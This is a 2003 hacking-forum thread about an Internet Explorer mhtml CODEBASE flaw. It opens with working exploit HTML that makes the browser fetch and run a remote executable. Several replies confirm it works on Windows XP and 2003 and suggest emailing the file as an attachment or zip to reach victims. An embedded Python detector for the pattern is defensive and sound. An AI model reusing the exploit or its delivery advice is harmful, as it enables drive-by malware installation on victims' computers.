gsicht
Nov 28 2003, 02:23 PM
advisory:
http://packetstormsecurity.org/0311-adviso.../mhtmlredir.txt
Do you know this vulnerability? I've found some HTML code for this:
| CODE |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script>
WaitForDocumentCached_TIME=100;

function LaunchRemoteExe_Step2() {
  //One more fresh action is present for more stable performance
  for(i=1;i<=2;i++) w.document.execCommand("Refresh");
}

function LaunchRemoteExe(ExeUrl) {
  w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");
  w.document.write("<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111113' CODEBASE='mhtml:file://C:\NO_SUCH_MHT.MHT!" + ExeUrl + "'>");
  setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME);
}

LaunchRemoteExe("http://127.0.0.1/EXE.EXE")
<!-- and end it with -->
</script>
</head>
<body>
</body>
</html>
|
It will download and execute EXE.EXE from
http://127.0.0.1/.
Can someone test this code? I don't have IE.
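For anyone triaging pages or mail attachments like the one posted above, here is a small detector (an added example, not code from this thread or from the linked advisory) that flags the pattern the advisory describes: an OBJECT CODEBASE whose value is an mhtml: URL, where the part after the `!` is the resource Internet Explorer fetches when the local .MHT named before it does not exist. A remote http(s) URL in that position is the signal worth alerting on. The sample HTML inside the script is constructed for this example, with example.invalid placeholders; the regex also catches the markup when it is assembled inside a document.write string, as in the posted script, in which case the target is reported as built at runtime.

```python
import re

# Matches a CODEBASE attribute whose value uses the mhtml: scheme, whether it
# appears in static markup or inside a JavaScript string handed to document.write.
CODEBASE_RE = re.compile(r"""codebase\s*=\s*['"]?\s*(mhtml:[^'"<>\s]*)""", re.IGNORECASE)


def find_mhtml_codebase(text):
    """Return one record per mhtml: CODEBASE found in the page text.

    An mhtml: URL has the form  mhtml:<local MHT location>!<resource inside it>.
    If the local MHT is missing, the part after '!' is fetched in its place,
    which is the redirection the linked advisory describes.
    """
    hits = []
    for m in CODEBASE_RE.finditer(text):
        value = m.group(1)
        local, bang, remote = value[len("mhtml:"):].partition("!")
        if not bang:
            verdict = "mhtml codebase without redirection target"
        elif remote == "":
            # The value ends at the closing quote of a JS string: the real
            # target is concatenated at runtime, so inspect the script.
            verdict = "redirection target built at runtime (check the script)"
        elif remote.lower().startswith(("http://", "https://")):
            verdict = "redirects to remote resource"
        else:
            verdict = "redirects to local resource"
        hits.append({
            "codebase": value,
            "local": local,
            "remote": remote if bang else None,
            "verdict": verdict,
        })
    return hits


# Constructed samples (not from the thread): one static OBJECT tag with a remote
# target, one benign CODEBASE for contrast, and one built the way the posted
# script does it.
SAMPLE_STATIC = """<object name="X" classid="CLSID:00000000-0000-0000-0000-000000000000"
        codebase="mhtml:file://C:\\missing.mht!http://example.invalid/drop.exe"></object>
<object classid="CLSID:00000000-0000-0000-0000-000000000001"
        codebase="http://example.invalid/legit.cab"></object>"""

SAMPLE_SCRIPTED = """<script>
w.document.write("<OBJECT NAME='X' CODEBASE='mhtml:file://C:\\NO_SUCH.MHT!" + url + "'>");
</script>"""


if __name__ == "__main__":
    for sample in (SAMPLE_STATIC, SAMPLE_SCRIPTED):
        for hit in find_mhtml_codebase(sample):
            print(hit["verdict"], "->", hit["local"], "!", hit["remote"])
```

The regex deliberately stops at quotes and whitespace rather than trying to parse the page as HTML, because the markup that matters here never reaches the DOM as static text; it exists only as a string literal in the script until document.write runs.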
liquidSilver
Nov 28 2003, 03:58 PM
Hello..
I will test it locally. Be right back with results.
Regards,
LiquidSilver.
liquidSilver
Nov 28 2003, 04:05 PM
No results at all.. Hmm.. I'll try some other methods.
Regards,
LiquidSilver.
gsicht
Nov 28 2003, 04:16 PM
i think its a very interesting bug.
here is a harmless example how to exploit:
http://www.safecenter.net/UMBRELLAWEBV4/1s...Demo/index.html
liquidSilver
Nov 28 2003, 04:31 PM
Hello..
Quote from the site:
| QUOTE |
This demo assumes 1.WinXp or Win2k3 is installed at C:\WINDOWS. 2.A small web page(less than 3 kbyte) can be downloaded within 4 seconds.
|
I am currently running Win98 on this computer, I will try it on my other Win2k computer later on.
Yes, it can be very interesting code - but what did I just download?! PayLoad.exe?! uhm..?!
Regards,
LiquidSilver.
liquidSilver
Nov 28 2003, 04:34 PM
Ah, I checked the exe file, it was empty.. hehe.
tareq
Nov 28 2003, 04:50 PM
It won't work, mate.
I tested it myself on WinXP SP1 5.1.2600.
Axl
Nov 29 2003, 09:20 AM
The second one looks nice!
Thanks!
gogu258
Dec 1 2003, 12:34 AM
It works on W2K (Windows 2000) but only locally. I think it should work on XP and 2003; a little research, but with a good result on W2K. It downloads the exe file and runs it, but as I told you before, only if you open the page on your system.
extreme
Dec 2 2003, 01:00 AM
Well, it wasn't meant to work remotely. But it should be enough too. Just attach the HTML file in an email.. Who would think that an HTML file could be infected..?!?
jawz
Dec 3 2003, 09:29 PM
The exploit works on my Windows XP. Fortunately, McAfee is able to detect and neutralize the exploit (Exploit-CodeBase).
aiboforcen
Dec 4 2003, 03:17 PM
www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.html
This exploit works fine for me too. But when I upload the exploit to another ASP host it won't work anymore. I think it's very strange, because I haven't changed the code and I have tried at least 3 different web hosts which support ASP.
Anyone got any solution?
mnemonix
Dec 8 2003, 11:52 AM
Works on xp sp1
Some nice work
gogu258
Dec 8 2003, 08:16 PM
There you have another problem: if your target doesn't use Outlook or something like that....like Yahoo email, your attachment will be shown as a web page, but remote, not local....so you have to use it as a zip file.....
FiStEh
Dec 9 2003, 04:46 PM
F-Secure anti-virus picked up the malicious code. D'oh, that would've been nice.
FiStEy
billkennedy32
Dec 9 2003, 05:41 PM
1stClean works remotely.
Just install IIS and copy the files to root.
http://216.126.97.46/
Feel free to hack the #*@t out of it: scan, exploit, whatever.
Good practice.
Have fun.
gogu258
Dec 9 2003, 06:05 PM
Hi,
It works on XP and W2K3 but not on 2K.
aiboforcen
Dec 10 2003, 09:56 AM
I heard that IIS on Win2K only allows 5 users visiting your site at the same time. Is it possible to get around this? Can I upgrade IIS maybe?
sonej
Dec 15 2003, 01:42 PM
The first code works great for me.
(Windows 2000 Server SP4)
piopio
Feb 2 2004, 01:22 PM
If you have GetRight or DAP, it prompts you to download the file.... this isn't good..